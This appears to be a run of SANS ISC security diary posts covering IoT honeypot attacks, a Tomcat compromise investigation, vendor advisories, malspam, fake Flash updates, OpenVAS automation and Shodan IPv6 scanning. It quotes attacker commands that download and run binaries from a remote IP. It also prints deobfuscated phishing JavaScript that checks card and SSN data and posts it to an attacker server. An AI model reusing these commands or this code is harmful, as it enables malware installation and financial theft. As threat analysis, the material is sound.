ftpget -u anonymous -p anonymous 149.202.242.80 tt.sh tt.sh;sh tt.sh;
tftp -r ttt.sh -g 149.202.242.80;sh ttt.sh

The binary downloaded looks like (here the wget version)

cp /bin/busybox ./;
wget http://149.202.242.80/arm;cat arm >busybox;rm -f arm; chmod 777 busybox;./busybox;
wget http://149.202.242.80/mips;cat mips >busybox;rm -f mips;./busybox;
wget http://149.202.242.80/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox

so essentially, the standard "busybox" binary is replaces with one of the other binaries. In this case, an ARM, MIPS and MIPS Little Ending version is retrieved.

The "sad" part about this: These attackers appear to go through some length to compile these scripts for various platforms, but the don't appear to do much at all, or are just broken. This is probably another indication of how simple it is to go after the IoTs. 

FWIW: If you use a Raspberry Pi, make sure to change the default password!!!! I am seeing a LOT of attempts to use the default credentials.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

VMware has re-issue VMSA-2015-0007.3 today after they found an earlier fix for CVE-2016-2342 was incomplete. Affected ESXi versions are: 5.0, 5.1 and 5.5. Advisory can be found here.

[1] https://www.vmware.com/security/advisories/VMSA-2015-0007.html

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Apache Tomcat is a java based web service that is used for different applications. While you may have it running in your environment, you may not be familiar with its workings to provide adequate incident response  when the time come. This article will walk through an incident where Tomcat is used and what critical artifacts you should collect.

This articles assumes that you have already collected MACtimes (hxxps://digital-forensics.sans.org/blog/2011/12/07/digital-forensic-sifting-super-timeline-analysis-and-creation) and other volatile data.

Locating Install Directory

Tomcat can be installed in several different locations, but the most common are for Redhat: /usr/share/apache-tomcat-(version) and for Ubuntu: /usr/share/tomcat or /var/lib/tomcat. To be sure you have the right locations track down the Tomcat process and analyze it.

    #ps -auxwww |fgrep -i tomcat

    0 S root     31847     1  0  80   0 - 1124641 futex_ 2015 ?       02:36:33 /usr/bin/java  -classpath /usr/share/apache-tomcat-7.0.65/bin/bootstrap.jar …..

Here you can see that it is running from /usr/share/apache-tomcat-7.0.65.  Depending on the install this will likely contain all the artifacts for tomcat that we need but we should still verify. If you are not getting an entire copy of the system, make sure that you get a backup of this directory along with the other critical ones.

Tomcat Logs

On the system I dealt with, the logs were in a subfolder called logs (e.g. /TOMCAT_HOME/logs). Check to make sure you have stuff in it, if not it is likely using syslog or the attacker cleared it out.

Catalina.out file is output from the tomcat console into this file. It is a multi-line log file, but has time and date stamps. This file shows if modules are added and other output that is useful for IR. Access_log is in common Apache format, but it is a simple format that does not have the user agent information. The manager.log and host-manager.log really did not have any useful information in my case.

For more information about Tomcat loging visit hxxps://tomcat.apache.org/tomcat-7.0-doc/logging.html

Web Applications Locations

Web applications are located on TOMCAT_HOME/webapps/. To deploy a web app, you must use the Tomcat web manager which you will see GETS and POSTS to /manager/ folder in the access logs.

For more info on Tomcat app deployment visit hxxps://tomcat.apache.org/tomcat-4.1-doc/appdev/deployment.html

Config File Locations

The Tomcat configurations are located in the TOMCAT_HOME/config directory.  Server.xml is the main server config file. Tomcat-users.xml is a list of users and passwords for the system. The default admin password is:admin:password.

The Incident

Now that we know where to look, let’s go over the incident.  A system was discovered to be compromised so I started our IR process. When looking at the processes running, a process was quickly changing its name and running as root.  When looking at the list of open files for the process, I got a hint that tomcat might have something to do with the compromise.

#ps -auxwww

10346 root 20 0 21852 952 212 S 25.9 0.0 7103:14 qymasclksx

#lsof -p 10346

qymasclks 10346 root   DIR 253,6 4096 275525 /usr/share/apache-tomcat-7.0.65/bin

qymasclks 10346 root rtd DIR 253,0 4096 2 /

qymasclks 10346 root txt REG 253,6 619090 3154 /usr/bin/qymasclksx

Lets see if any files have changed in the Tomcat directory recently to get an idea of possible time of compromise. The file in /usr/bin/qymasclksx is being deleted and recreated every few seconds, so that will not be helpful for initial compromise time.

Tue Dec 01 2015 05:58:38,493137,mac.,-rw-r--r--,0,0,0,"/usr/share/apache-tomcat-7.0.65/webapps/eei.war"

Tue Dec 01 2015 05:58:38,69334,.ac.,-rw-r--r--,0,0,0,"/usr/share/apache-tomcat-7.0.65/webapps/eei/a.jsp"

There is a new file eei.war that has been created. Lets take a look at the log files and see what we can get from that time frame.  

#fgrep “Dec 01, 2015” Catalina.out

Dec 01, 2015 5:58:38 AM org.apache.catalina.startup.HostConfig deployWAR

INFO: Deploying web application archive /usr/share/apache-tomcat-7.0.65/webapps/eei.war

Dec 01, 2015 5:58:38 AM org.apache.catalina.startup.HostConfig deployWAR

INFO: Deployment of web application archive /usr/share/apache-tomcat-7.0.65/webapps/eei.war has finished in 118 ms

You can see that a new application has been deployed, which means the attacker had access to the Tomcat admin.  Let look at the access_logs to see if we can get more detail.

#fgrep “01/Dec/2015” access_logs

122.236.51.194 - - [01/Dec/2015:05:58:08 -0500] "GET /manager/html HTTP/1.1" 401 2474

122.236.51.194 - admin [01/Dec/2015:05:58:09 -0500] "GET /manager/html HTTP/1.1" 200 19270

122.236.51.194 - admin [01/Dec/2015:05:58:39 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=4C0343589816E985E2010C618944EF5A HTTP/1.1" 200 20940

122.236.51.194 - - [01/Dec/2015:05:58:43 -0500] "GET /eei/ HTTP/1.1" 200 3319

122.236.51.194 - - [01/Dec/2015:05:58:45 -0500] "POST /eei/ HTTP/1.1" 200 6383

122.236.51.194 - - [01/Dec/2015:05:58:49 -0500] "GET /eei/?action=command HTTP/1.1" 200 2677

122.236.51.194 - - [01/Dec/2015:05:58:55 -0500] "POST /eei/?action=command HTTP/1.1" 200 2736

122.236.51.194 - - [01/Dec/2015:05:58:58 -0500] "POST /eei/?action=command HTTP/1.1" 200 2725

Here you can see that the attacker accessed the Tomcat management as the admin user and uploaded a file. Then the attacker access another page that accepts a command via a POST. Let’s see how the attacker was able to gain access as the admin user to the manager site. By viewing the tomcat-users.xml file, we can see that a very common username/password is being used.

/usr/share/apache-tomcat-7.0.65/conf/tomcat-users.xml

-->

The package that was installed was  “jsp File browser 1.1a”. This allowed the attacker to install his backdoor/DDOS tool called Xorddos. Mandint did a write-up about this and mostly what I found was similar to their findings. (hxxps://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html)

Other IOC(s)

MD5 filehash:        

 968c4e06ff32d97b1f2b3f2ce3bcbb7e, gfty

 a568167a5950ae55f6f442d959de4476, libkill.so

 cac58ebacb036f706d58ec9f47ee64cc, eei.war

filename:      

 c.rar

 libkill.so

 cmd.n

 eei.war

 cron.sh

 kill.sh

filepath:        

/usr/share/apache-tomcat/webapps/eei

/lib

/etc/cron.hourly/

/lib/udev

IPS:

222.186.21.166 (Download site w/ wget)

122.236.51.194 (Attacker IP)

23.234.60.143 (C.rar download every 30 min)

--

Tom Webb

Cisco released an advisory revealing a critical vulnerability in Cisco's ASA software. Devices are vulnerable if they are configured to terminate IKEv1 or IKEv2 VPN sessions. (CVE-2016-1287)

[Update] Also see this writeup with LOTS of details https://blog.exodusintel.com/2016/02/10/firewall-hacking/

The vulnerability can lead to a complete compromise of the system. A single UDP packet may suffice to exploit the vulnerability, but no details about the nature of the vulnerability have been made public yet, but it is recommended to patch SOON. The exploit would likely arrive over UDP port 500 or possibly 4500.

We are seeing a LARGE INCREASE in port 500/UDP traffic (see https://isc.sans.edu/port.html?port=500 and select TCP Ratio for the left Y axis. earlier spikes affecting this port were mostly TCP)

To test if your device is vulnerable, check the running crypto maps:

ciscoasa# show running-config crypto map | include interface
 

A product is vulnerable if a crypto map is returned.

There is no workaround, but Cisco has released patched firmware for affected devices.

[1] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160210-asa-ike

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

I am currently working on an easy way to turn a Raspberry Pi into a DShield sensor. If you would like to, you can try the current "beta version" of the software. Feedback is very much appreciated. To get started:

• Install Raspbian Jessie on your Pi https://www.raspberrypi.org/downloads/raspbian/
• change the default password (VERY IMPORTANT!!!)
• claim the entire SD card for Raspbian (by default, you only use 4GB, and space may be tight). the easiest way to do this is to run sudo raspi-config and select "expand roofs"
• you will need the e-mail address, the numeric userid and the "authkey" for your ISC/DShield account. You can retrieve it here: https://isc.sans.edu/myaccount.html
• Download the software from github: git clone https://github.com/DShield-ISC/dshield.git
• run the install script sudo dshield/bin/install.sh
• enjoy (hopefully... and please let me know what works/doesn't work, if possible by entering an "issue" with github https://github.com/DShield-ISC/dshield/issues ) .

Important: The install script will move the SSH server to port 12222. So the next time you connect after a reboot, you will need to connect to that port (ssh -p 12222 pi@[your pi IP]) . The reason we do this is to keep port 22 free for an ssh honeypot.

In order to make the Raspberry Pi a useful sensor, you need to expose it to network traffic. For example, you could use your router's "DMZ" feature to expose the system. Other Raspbian versions may work, and if you do have one, by all means test it and let me know how it goes.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

APSB16-03: Adobe Photoshop CC and Bridge CC

3 critical vulnerabilities that could lead to code execution with a priority rating of 3 (low): CVE-2016-0951, CVE-2016-0952, CVE-2016-0953. You may have to download the updates directly from Adobe as they will not show up in Creative Cloud Packager!

APSB16-04: Adobe Flash Player

22 critical vulnerabilities that could lead to code execution. The priority rating is 1 for Flash Player (including the Flash Player embedded in Chrome/Edge/Internet Explorer 11) . 

APSB16-05: Adobe Experience Manager

4 important vulnerabilities that could lead to information disclosure. This includes fixes for the Java deserialization issues. 

APSB16-07: Adobe Connect

3 important vulnerabilities that lead to input validation and content spoofing issues. (including cross site request forgery). The priority rating for this update is 1 (low).

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Overview of the February 2016 Microsoft patches and their status.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Oracle released an emergency update for Java [1]. The nature of the flaw, and how the update fixes the flaw, is somewhat obscured. According to Oracle's advisory, the user would first have to install malicious software, then install Java. So it doesn't appear to be exploitable on any system that has Java already installed. The Oracle advisory also states that an exploit is complex.

At this point, I don't see a compelling reason to "rush out" this patch. Deal with it as part of your regular patch process. Some of the Microsoft patches to be released later today are likely more important.

[1] https://blogs.oracle.com/security/entry/security_alert_cve_2016_0603

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Yesterday, I found an interesting phishing email. Nothing fancy or exotic about the content, just a classic email notification pretending to be sent by Paypal and asking the victim to urgently review and update his/her personal settings. The message was clever enough to not trigger anti-spam rules. The SpamAssassin score was 3.7, just low enough to pass the control:

X-Spam-Status: No, score=3.7 required=4.0 tests=BAYES_20,RCVD_NUMERIC_HELO, SARE_TOCC_COMBO1,TVD_PH_SEC,T_HK_FAKENAME_PAYPAL,T_OBFU_HTML_ATTACH autolearn=no version=3.3.2

The attached file is just simple a regular HTML file containing some obfuscated JavaScript code. This page was unknown to VT when I checked it. Here is a dump of the JavaScript code (beautified for easier reading):

function wp_plugin(r) {
    var e, n, i, t, a, d, o, f, h = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
        c = 0,
        C = 0,
        g = "",
        x = [];
    if (!r) return r;
    r += "";
    do
        t = h.indexOf(r.charAt(c++)),
        a = h.indexOf(r.charAt(c++)),
        d = h.indexOf(r.charAt(c++)),
        o = h.indexOf(r.charAt(c++)),
        f = t << 18 | a << 12 | d << 6 | o,
        e = f >> 16 & 255,
        n = f >> 8 & 255,
        i = 255 & f,
        64 == d ? x[C++] = String.fromCharCode(e) : 64 == o ? x[C++] = String.fromCharCode(e, n) : x[C++] = String.fromCharCode(e, n, i); while (c < r.length);
    return g = x.join(""), g.replace(/\0+$/, "")
}
function GoogleAnalytics(r, o) {
    s = new Array;
    for (var a = 0; 256 > a; a++) s[a] = a;
    var e, n = 0;
    for (a = 0; 256 > a; a++) n = (n + s[a] + r.charCodeAt(a % r.length)) % 256, e = s[a], s[a] = s[n], s[n] = e;
    a = 0, n = 0;
    for (var t = "", f = 0; f < o.length; f++) a = (a + 1) % 256, n = (n + s[a]) % 256, e = s[a], s[a] = s[n], s[n] = e, t += String.fromCharCode(o.charCodeAt(f) ^ s[(s[a] + s[n]) % 256]);
    return t
}
var GA_PLUGIN = “.....redacted.....";
var _0xbf60 = ["GA-ID18998", "\x77\x72\x69\x74\x65"];
var GA_PLUGIN1 = wp_plugin(GA_PLUGIN);
var GA_DLL = GoogleAnalytics(_0xbf60[0], GA_PLUGIN1);
document[_0xbf60[1]](GA_DLL)

A first analyze shows that functions are named with common strings for websites (Wordpress, Google Analytics). No “suspicious” string is present in the code that could trigger a security control. The variable GA_PLUGIN contains ~23KB of data (that have been removed in this post) that looks immediately to be BASE64 encoded. A copy of the original HTML file is available here if you're interested.

GA_PLUGIN is used by wp_plugin() which is a BASE64 decoder function. Let’s decode it manually and we obtain a binary file without any interesting patterns / strings in it. The binary content is passed to the GoogleAnalytics() function with a second parameter (the key). I tried a simple XOR but it failed. The function being available in the code, I did not loose my time and just executed it in a sandbox to get the decoded data which is the complete HTML page that is finally displayed it in the browser via the last line (_0xbf60[1] = “write”). The page looks pretty good:

Here again, the decoded HTML page contains a second layer of obfuscation with more JavaScript code. When the victim clicks on “Submit Form”, data are not posted directly to a remote server but the xsub() function is called. The arrays contain just strings in hexadecimal encoding, nothing fancy. Here is the beautified code:

var _0x22eb9a = "c113b797cd0456be0d1a9c2f35f7d78b.php";
var _0x2da3 = ["\x6C\x65\x6E\x67\x74\x68", "\x63\x68\x61\x72\x41\x74", "\x68\x74\x74\x70\x3A\x2F\x2F\x74\x31\x2E\x73\x79\x73\x74\x65\x6D\x66\x69\x6C\x74\x65\x72\x73\x2E\x6E\x65\x74\x2F", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x61\x79\x70\x61\x6C\x2E\x63\x6F\x6D\x2F", "\x72\x65\x70\x6C\x61\x63\x65", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x61\x63\x74\x69\x6F\x6E", "\x65\x6E\x76", "\x66\x6F\x72\x6D\x73", "\x6D\x65\x74\x68\x6F\x64", "\x70\x6F\x73\x74", "\x73\x75\x62\x6D\x69\x74"];
var _0x27ca82 = (function(_0xe689x2) {
    return function(_0xe689x3) {
        var _0xe689x4 = _0xe689x3[_0x2da3[0]],
            _0xe689x5 = 1,
            _0xe689x6 = 0,
            _0xe689x7;
        while (_0xe689x4) {
            _0xe689x7 = parseInt(_0xe689x3[_0x2da3[1]](--_0xe689x4), 10);
            _0xe689x6 += (_0xe689x5 ^= 1) ? _0xe689x2[_0xe689x7] : _0xe689x7
        };
        return _0xe689x6 && _0xe689x6 % 10 === 0
    }
}([0, 2, 4, 6, 8, 1, 3, 5, 7, 9]));
var _0x98a278 = _0x2da3[2];
var _0xbbd7eb = 0;

function xsub() {
    if (!_0x11e97d()) {
        window[_0x2da3[5]][_0x2da3[4]](_0x2da3[3]);
        return false
    };
    if (!_0xbbd7eb) {
        _0x98a278 += _0x22eb9a
    };
    _0xbbd7eb++;
    document[_0x2da3[8]][_0x2da3[7]][_0x2da3[6]] = _0x98a278;
    document[_0x2da3[8]][_0x2da3[7]][_0x2da3[9]] = _0x2da3[10];
    document[_0x2da3[8]][_0x2da3[7]][_0x2da3[11]]()
}
var _0x9939 = ["\x76\x61\x6C\x75\x65", "\x63\x63\x61\x72\x64\x6E\x75\x6D", "\x65\x6E\x76", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x61\x79\x70\x61\x6C\x2E\x63\x6F\x6D\x2F", "\x72\x65\x70\x6C\x61\x63\x65", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x63\x61\x64\x64\x72", "\x63\x65\x78\x70\x6D", "\x63\x65\x78\x70\x79", "\x63\x63\x76\x76", "\x6E\x61\x6D\x65", "\x30\x30", "\x63\x73\x73\x6E", "\x6C\x65\x6E\x67\x74\x68", "\x2D", "\x69\x6E\x64\x65\x78\x4F\x66", "\x55\x6E\x69\x74\x65\x64\x20\x53\x74\x61\x74\x65\x73", "\x63\x63\x6F\x75\x6E\x74\x72\x79", "\x63\x7A\x69\x70"];

function _0x11e97d() {
    ax = _0x27ca82(document[_0x9939[2]][_0x9939[1]][_0x9939[0]]);
    if (!ax) {
        return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1
    };
    var _0x88a0x2 = document[_0x9939[2]][_0x9939[6]][_0x9939[0]],
        _0x88a0x3 = document[_0x9939[2]][_0x9939[7]][_0x9939[0]],
        _0x88a0x4 = document[_0x9939[2]][_0x9939[8]][_0x9939[0]],
        _0x88a0x5 = document[_0x9939[2]][_0x9939[9]][_0x9939[0]];
    if (!document[_0x9939[2]][_0x9939[10]][_0x9939[0]] || !_0x88a0x2 || !_0x88a0x5 || _0x9939[11] == _0x88a0x3 || _0x9939[11] == _0x88a0x4) {
        return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1
    };
    _0x88a0x2 = document[_0x9939[2]][_0x9939[12]][_0x9939[0]];
    _0x88a0x3 = _0x88a0x2[_0x9939[13]];
    _0x88a0x4 = 9; - 1 != _0x88a0x2[_0x9939[15]](_0x9939[14]) && (_0x88a0x4 += 2);
    if (_0x9939[16] == document[_0x9939[2]][_0x9939[17]][_0x9939[0]]) {
        if (0 < _0x88a0x3 && _0x88a0x3 != _0x88a0x4) {
            return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1
        };
        _0x88a0x2 = document[_0x9939[2]][_0x9939[18]][_0x9939[0]][_0x9939[13]];
        if (0 < _0x88a0x2 && 5 != _0x88a0x2) {
            return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1
        }
    };
    return !0
}

The interesting line is the first one which contains the PHP page where data are posted. If you browse the code, you see that it is appended to _0x2da3[2] to "\x68\x74\x74\x70\x3A\x2F\x2F\x74\x31\x2E\x73\x79\x73\x74\x65\x6D\x66\x69\x6C\x74\x65\x72\x73\x2E\x6E\x65\x74\x2F" to build the malicious URL:

http://t1.systemfilters.net/c113b797cd0456be0d1a9c2f35f7d78b.php

Another interesting function is _0x11e97d() which performs multiple checks against the data submitted by the victim. Indeed, the attacker took the time to validate the data passed via the form. If one of them does not match the requirements, nothing is sent to the malicious server and just a redirect occurs. Example: The credit card number and SSN are checked (via the function _0x27ca82()). To successfully submit my test data, I bypassed _0x11e97d() with a simple "return 1”. Then the server t1.systemfilters.net was contacted and data sent to it. Here is a pcap:

After the successful POST, an HTTP 302 redirects the victim to the real Paypal page.

In this phishing campaign, victims from the United States are targeted because a real SSN is mandatory. It also demonstrates that the attacker took extra care to validate the data to get only valid information sent to him. This is a nice example of multiple obfuscation levels, nothing is downloaded from the Internet, the user has just to execute the HTML file attached to the email. 

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

For many reasons,most ISPs are finding that service affecting DDOSes, which were a common occurrence as little as a year ago are rare in the later half of 2015 and so far in 2016.  Hopefully the arrest of some alleged members of DD4BC will also put a damper on the DDOS for ransom fad.  That said DDOS is not dead.  It appears booters services, DDOS for hire services with intent to be a nuisance for individual Internet users, are still a problem which ISPs worldwide are seeing.

The graph shows the common UDP traffic for one ISP.

The large spikes show DDOS attacks, typically aimed at a single IP.   As you can seen the traffic is typically a mix of DNS, port 0, with some chargen thrown in.  For some reason SSDP, which was a large part of attacks in the recent past, has become a small part of the traffic mix in today's attacks. 

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

It has been a while, but I finally got around to fixing a bug in my script for putting kippo text logs into a kippo-formatted MySQL database.  In this case, it was a bug that caused the sensor column in the sessions table to be NULL instead of the correct value.  I just used the updated script to analyze 2.8M login attempts from 2015 in one of my kippo honeypots.  I first wrote about the script here.  I've also moved some of my tools including this script to github.  You can find the latest version here.  I think I may have another bug that was reported by a user a while back to fix, I'll try to get to that in the next month.  In the meantime, I welcome thoughts and comments by e-mail or in the comments.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

Introduction

I was discussing malicious spam (malspam) with a fellow security professional earlier this week.  He was examining malspam with zip attachments containing .js files.  This is something I've covered previously in ISC diaries [1, 2].  However, the traffic patterns he saw was somewhat different than I've seen, so I figured it's time to revisit this type of malspam.

Details

This particular wave of .js malspam started on Wednesday 2016-02-03, and these emails were reported by My Online Security the same day [3].  We continued to see this malspam on Thursday 2016-02-04.

I found 13 messages with the following subject lines during the past two days:

• Problem with the Order, Reference: #117931 
• Problem with the Order, Reference: #469155 
• Problem with Your Order, Reference: #543361 
• Problem with Your Purchase, Reference: #629146 
• Problem with Your Purchase, Reference: #913251 
• Problems with the Purchase, Reference Number #568643 
• Problems with Your Purchase, Reference Number #199837 
• Problems with Your Purchase, Reference Number #797440 
• Problems with Your Purchase, Reference: #113736 
• Troubles with the Order, Reference: #719684 
• Troubles with the Purchase, Reference Number #459991 
• Troubles with the Purchase, Reference Number #529057 
• Troubles with Your Order, Reference: #987848 

Attachments names were different for each of the 13 messages:

• Ali Washington.zip
• Cary Harris.zip
• Dino Hayden.zip
• Garth Porter.zip
• Hans Fitzgerald.zip
• Harold Walter.zip
• Leonel Mcneil.zip
• Marc Harding.zip
• Nickolas Baldwin.zip
• Romeo Wright.zip
• Stanley Floyd.zip
• Ted Fields.zip
• Ward Shea.zip

Each of the attachments were zip files that contained a .js file.  The .js file is typically launched by Windows Script Host (wscript.exe) when the file is double-clicked on a Windows desktop.

The script in these .js files is highly-obfuscated.  ISC Handler Xavier Mertens wrote a diary on how to examine these scripts [4]; however, I prefer to execute the .js files and see where the traffic takes us.

Traffic and malware

Each of the scripts tried to download and execute three malware items.  The HTTP requests were:

• csonegame.com - GET /img/script.php?wndz1.jpg
• csonegame.com - GET /img/script.php?wndz2.jpg
• csonegame.com - GET /img/script.php?wndz3.jpg

I tried all 13 of the extracted .js files and saw the same URL patterns.

Unfortunately, by the time I ran these .js files, the malware was no longer available.

Fortunately, others had already ran the malware through different online tools, and I was able to find all three items downloaded by the .js files.

script.php_wndz1.jpg - 255.5 KB (261,632 bytes) -  File type: Windows EXE

• Hybrid-analysis.com link
• Virus Total link

script.php_wndz2.jpg - 159.5 KB (163,328 bytes) -  File type: Windows EXE

• Hybrid-analysis.com link
• Virus Total link

script.php_wndz3.jpg -  84.5 KB (86,528 bytes) -  File type: Windows EXE

• Hybrid-analysis.com link
• Virus Total link

Based on the callback traffic reported on the first sample, that file appears to be CryptoWall.  I haven't had the time to dig into the other two items.

Final words

After posting this diary, someone deobfuscated the script from the .js files and emailed me the results (Thanks Ali!).  Images of the work are included below.

Shown above:  Obfuscated script from the .js file.

Shown above:  Deobfuscated script from the .js file.

The malspam and malware samples can be found here.  My thanks to Chris, who emailed me about this most recent wave of malspam.

---
Brad Duncan
Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://isc.sans.edu/forums/diary/Malicious+spam+continues+to+serve+zip+archives+of+javascript+files/19973/
[2] https://isc.sans.edu/forums/diary/Malicious+spam+with+zip+attachments+containing+js+files/20153/
[3] http://myonlinesecurity.co.uk/congratulations-your-order-has-been-shipped-out-parcel-441467-js-malware/ 
[4] https://isc.sans.edu/forums/diary/JavaScript+Deobfuscation+Tool/20619/

Yesterday, while investigating some Facebook click-bait, I came across a fake Flash update that is targeting OS X users. Fake flash updates have been very common to infect OS X. They do not rely on a vulnerability in the operating system. Instead, the user is asked to willingly install them, by making them look like genuine Adobe Flash warnings (and we keep telling users to make sure Flash is up to date, so they are likely going to obey the warning and install the update).

The "Installer" for the fake Flash update will install various scare ware (I observed a couple different varieties when re-running the installer), and it actually installs an up to date genuine version of Flash as well.

While I wasn't able to capture the exact trigger for the popup advertising the update, I suspect it was injected by one of the many ads on the page:

Once the user clicks on the popup, the following page offers the Flash Player update for download:

Antivirus coverage was pretty bad yesterday when I came across this (4 out of 51 on Virustotal). On a brand new OS X 10.11 install, the "Installer" appears to install a genuine copy of Adobe Flash in addition to Scareware that asks for money after informing you of various system problems.

The installer is signed with a valid Apple developer certificate issued to a Maksim Noskov:

I recorded a small video showing what happens when you install the "update" on a clean OS X 10.11 system:

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Microsoft announced on the TechNet blog the availability of a new version of its EMET tool (EMET stands for "Enhanced Mitigation Experience Toolkit"). The purpose of this tool is to implement extrat security controls to prevent common vulnerabilities in software like: DEP ("Data Execution Prevention"), ASLR ("Address Space Layout Randomization") or certificate trust (Pinning).

The new release introduces the following changes:

• Compatibility with Windows 10
• Improved deployment and configuration via GPO
• Improved writing of the mitigations to the registry
• EAF/EAF+ pseudo-mitigation performance improvements
• Support for untrusted fonts mitigation in Windows 10

More info about configuration guidelines is available here.

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

• get-targets
• get-tasks
• create-tasks
• start-tasks

The number of action is quite limited and allow only basic tasks. But it provides the “-X” or "--xml” argument which allows us to send raw XML data to the server! This is much more powerful! (a complete reference is available here). To use omp, the very first step is to create a configuration file to automate the connection. Create a $HOME/omp.config file like this:

[Connection]
host=127.0.0.1
port=9390
username=xavier
​password=mystrongpassword

$ omp --pretty-print --xml "<get_targets/>"
<get_targets_response status_text="OK" status="200">
     <target id="dcc82d64-1c87-44d8-aef5-24c1f552ddcd">
          <owner>
               <name>xavier</name>
          </owner>
          <name>Local Hosts</name>
          <comment></comment>
          <creation_time>2016-02-02T22:12:08+01:00</creation_time>
          <modification_time>2016-02-02T22:12:08+01:00</modification_time>                            
          <writable>1</writable>
          <in_use>1</in_use>
          <permissions><permission>
          <name>Everything</name>
          </permission></permissions>
          <user_tags>
               <count>0</count>
          </user_tags>
          <hosts>192.168.254.0/24</hosts>
          <exclude_hosts></exclude_hosts>
          <max_hosts>254</max_hosts>
          <port_list id="c7e03b6c-3bbe-11e1-a057-406186ea4fc5">
               <name>OpenVAS Default</name>
               <trash>0</trash>
          </port_list>
          <ssh_lsc_credential id="">
               <name></name>
[... stuff removed ...]

• Create a target
• Create a tasks (and assign the target to it)
• Start the task
• Get results

$ omp --xml '
<create_target>
     <name>My New Scan</name>
     <hosts>192.168.254.0/24</hosts>
</create_target>'

<create_target_response id="dcc82d64-1c87-44d8-aef5-24c1f552ddcd" status_text="OK, resource created" status="201"></create_target_response>

$ omp --xml ‘...’ | xmlstarlet sel -t -v /create_target_response/@id
dcc82d64-1c87-44d8-aef5-24c1f552ddcd

$ omp --xml '
<create_task>
        <name>My New Scan</name>
        <preferences>
                <preference>
                        <scanner_name>source_iface</scanner_name>
                        <value>eth0</value>
                </preference>
        </preferences>
        <config id="74db13d6-7489-11df-91b9-002264764cea"/>
        <target id="dcc82d64-1c87-44d8-aef5-24c1f552ddcd"/>
</create_task>'

<create_task_response id="8fc4cccd-243f-4edb-a390-5f83d04f90b6" status_text="OK, resource created" status="201"></create_task_response>

$ omp --xml ‘<get_tasks/>'

$ omp —xml ‘<start_task task_id="8fc4cccd-243f-4edb-a390-5f83d04f90b6"/>

<start_task_response status=“200" status_text="OK"/>

$ omp --xml '
<get_reports report_id="cc995c30-0a5d-486d-a02f-a03eba63172a"
format_id="c402cc3e-b531-11e1-9163-406186ea4fc5”/>’

IPv6 poses a problem for systems like Shodan, who try to enumerate vulnerabilities Internet-wide. Tools like zmap can scan the IPv4 internet in minutes (or maybe hours), but for IPv6, the same approach will still fail. The smallest IPv6 subnet is a /64, or 18.4 Quintillion addresses. A tool like zmap would take about 40,000 years to scan just the smallest subnet that may be assigned to a home user, assuming 5 minutes to scan 32 bits worth of addresses.

There are a couple of methods to make IPv6  scanning somewhat feasible:

• "interesting systems," like gateways, web servers, DNS servers and the like, often use non-random IP addresses like 2001:db8::1, 2001:db8::50 or 2001:db8::35. This will narrow the scope somewhat. 
• Reverse DNS records may give away some of these addresses.
• Yes, the last 64 bits may be derived from the MAC address, and not all MAC addresses are used.
• Finally: The system may be reaching out to you

Looks like Shodan started to use the last option recently. Systems using the "pool.ntp.org" NTP servers have been observed as being scanned by Shodan. It appears that the Shodan project did add one or more NTP servers to the public NTP pool to find targets for its unauthorized scans [2]. Other scanner projects may do the same. DNS servers could of course be used in the same way, but there are no open DNS servers pools like this I am aware off (OpenDNS or Google could do similar tests, but I am not aware of them allowing 3rd parties into their pool).

So what to do about it?

Depending on how you feel about being scanned by Shodan, you may not care. But in particular with IPv6, databases like Shodan (Google and other web search engines too of course) will play a larger role in finding targets than they already do. As a first step, you probably should "fix" your NTP infrastructure. Systems in your network should only synchronize with internal NTP servers, and only these authorized NTP servers should communicate with the outside (or better, an internal standard like GPS or GSM). If you have a GPS signal in your environment, you may be able to setup a Raspberry Pi based "master clock". [3] In an enterprise network, buy a professional NTP server that includes a GSM or GPS module. (GSM usually works better in data centers without requiring an external rooftop antenna). 

Also consider using a secure NTP configuration template [4] to avoid other issues, like the famous monlist problem. NTP is a bit of a "forgotten" protocol in that it "just works" without having to mess with it in many cases. But if you didn't configure it, it probably isn't configured right for you.

FWIW: Our threat feeds include lists of internet wide research scanners (IPv4 only at this point). You can get a quick machine parsable version from our API (https://isc.sans.edu/api/threatcategory/research/), or a more visually appealing version using our threat feed map. 

[1] http://arstechnica.com/security/2016/02/using-ipv6-with-linux-youve-likely-been-visited-by-shodan-and-other-scanners/
[2] http://netpatterns.blogspot.de/2016/01/the-rising-sophistication-of-network.html
[3] https://xmission.com/blog/2014/05/28/building-a-stratum-1-ntp-server-with-a-raspberry-pi
[4] http://www.team-cymru.org/secure-ntp-template.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn